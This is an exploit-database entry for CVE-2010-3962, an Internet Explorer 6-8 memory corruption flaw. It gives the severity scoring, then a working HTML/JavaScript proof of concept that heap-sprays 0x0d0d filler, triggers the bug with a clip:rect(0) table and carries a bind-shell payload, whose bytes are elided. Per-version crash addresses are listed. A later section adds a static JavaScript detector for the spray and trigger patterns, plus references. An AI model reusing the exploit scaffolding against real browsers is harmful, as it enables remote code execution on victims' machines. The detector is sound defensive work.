Internet Explorer 6, 7, 8 Memory Corruption 0day Exploit

2010.11.12
Risk: High
Local: No
Remote: Yes
CWE: CWE-399


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Internet Explorer Memory Corruption 0day Vulnerability CVE-2010-3962
# Tested on Windows XP SP3 IE6 IE7 IE8
# Coded by Matteo Memelli ryujin __at__ offsec.com
# http://www.offensive-security.com/0day/ie-0day.txt
# Thx to dookie __at__ offsec.com
# notes : This is a quick and dirty exploit! No DEP/ASLR bypass here feel free to improve it

<!--
Tested on IE6/IE7/IE8 XPSP3
quick and dirty sploit for CVE-2010-3962 zeroday

Note:
The EIP value at crash time depends on the exact version of the mshtml library used by IE.
This means that the exploit is not universal for the IE versions indicated in the exploit.

IE6 on XP SP2: mshtml.dll Version 6.0.2900.5512   EIP: 0x0D7DC9C9
IE7 on XP SP3: mshtml.dll Version 7.00.6000.17080 EIP: 0x303CEEBB
IE8 on XP SP3: mshtml.dll Version 8.00.6001.18939 EIP: 0x1D3CF5BD

Matteo Memelli, ryujin __at__ offsec.com
thx to dookie __at__ offsec.com
//-->
<html>
<head><title>poc CVE-2010-3962 zeroday</title>
<script>
function alloc(bytes, mystr) {
    // Bindshell on port 4444
    var shellcode = unescape('[encoded payload omitted]');
    while (mystr.length< bytes) mystr += mystr;
    return mystr.substr(0, (bytes-6)/2) + shellcode;
}
</script>
</head>
<body>
<script>
alert('ph33r: click me');
var evil = new Array();
var FAKEOBJ = unescape("%u0d0d%u0d0d");
//FAKEOBJ = alloc(233120, FAKEOBJ); // IE6
//FAKEOBJ = alloc(733120, FAKEOBJ); // IE7
FAKEOBJ = alloc(433120, FAKEOBJ); // IE8
for (var k = 0; k < 1000; k++) {
    evil[k] = FAKEOBJ.substr(0, FAKEOBJ.length);
}
document.write("<table style=position:absolute;clip:rect(0)>");
</script>
</body>
</html>
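
The patterns visible in the proof of concept above (a long %u-escaped string passed to unescape(), a repeated filler value grown by string doubling, and a table written with position:absolute and clip:rect(0)) can be matched statically when triaging captured pages. The following is an added example, not part of the original exploit or advisory; the rule names, the scoring and the sample inputs are assumptions constructed for illustration.

```javascript
// Added example (not from the original PoC). Rule names and thresholds are assumptions.

// Pull every inline style value: quoted or unquoted (the PoC uses an unquoted one).
const STYLE_ATTR = /style\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>"']+))/gi;

const RULES = [
  // Long run of %uXXXX escapes: binary data carried through unescape().
  { id: "escaped-binary", re: /(?:%u[0-9a-f]{4}){16,}/i },
  // unescape() of one repeated 16-bit unit, e.g. the page's %u0d0d%u0d0d filler.
  { id: "spray-filler", re: /unescape\(\s*["'](%u[0-9a-f]{4})\1+["']\s*\)/i },
  // String doubling loop: while (s.length < n) s += s;
  { id: "doubling-loop", re: /while\s*\(\s*(\w+)\.length\s*<\s*[\w.]+\s*\)\s*\1\s*\+=\s*\1\b/ },
];

// True when one style value has both position:absolute and clip:rect(0),
// the combination the PoC writes into a <table>.
function hasClipTrigger(html) {
  for (const m of html.matchAll(STYLE_ATTR)) {
    const style = (m[1] || m[2] || m[3] || "").replace(/\s+/g, "").toLowerCase();
    if (style.includes("position:absolute") && /clip:rect\(0(?:px)?\)/.test(style)) return true;
  }
  return false;
}

function scanPage(html) {
  const hits = RULES.filter((r) => r.re.test(html)).map((r) => r.id);
  if (hasClipTrigger(html)) hits.push("clip-trigger");
  return hits;
}

// The style combination plus any spray indicator: block. Either alone: review.
function verdict(html) {
  const hits = scanPage(html);
  const spray = hits.some((h) => h !== "clip-trigger");
  if (hits.includes("clip-trigger") && spray) return "block";
  return hits.length ? "review" : "pass";
}

// Constructed samples: structure mirrors the PoC, payload replaced by harmless %u4141.
const SAMPLE_SUSPICIOUS = [
  "<script>function alloc(bytes, s) {",
  "  var data = unescape('" + "%u4141".repeat(20) + "');",
  "  while (s.length< bytes) s += s; return s.substr(0, (bytes-6)/2) + data; }",
  "var filler = unescape(\"%u0d0d%u0d0d\");",
  "document.write(\"<table style=position:absolute;clip:rect(0)>\");</script>",
].join("\n");
const SAMPLE_BENIGN = '<div style="position:absolute; clip:rect(0px, 10px, 10px, 0px)">menu</div>';

console.log(verdict(SAMPLE_SUSPICIOUS), scanPage(SAMPLE_SUSPICIOUS), verdict(SAMPLE_BENIGN));
```

Static matching of this kind only sees literal text, so use hits as triage signals alongside the vendor fix referenced below, not as the sole control.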

References:

http://www.kb.cert.org/vuls/id/899748
http://xforce.iss.net/xforce/xfdb/62962
http://www.vupen.com/english/advisories/2010/2880
http://www.symantec.com/connect/blogs/new-ie-0-day-used-targeted-attacks
http://www.securitytracker.com/id?1024676
http://www.microsoft.com/technet/security/advisory/2458511.mspx
http://www.exploit-db.com/exploits/15421
http://www.exploit-db.com/exploits/15418
http://secunia.com/advisories/42091
http://blogs.technet.com/b/msrc/archive/2010/11/02/microsoft-releases-security-advisory-2458511.aspx

